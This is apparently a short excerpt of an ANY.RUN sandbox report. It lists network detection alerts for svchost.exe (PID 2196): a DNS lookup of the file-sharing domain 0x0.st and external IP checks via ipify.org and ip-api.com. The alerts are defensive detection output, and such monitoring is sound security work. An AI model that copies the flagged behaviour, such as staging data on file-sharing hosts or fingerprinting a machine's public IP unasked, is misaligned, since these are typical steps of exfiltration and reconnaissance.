ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)
2196
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
2196
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
No debug info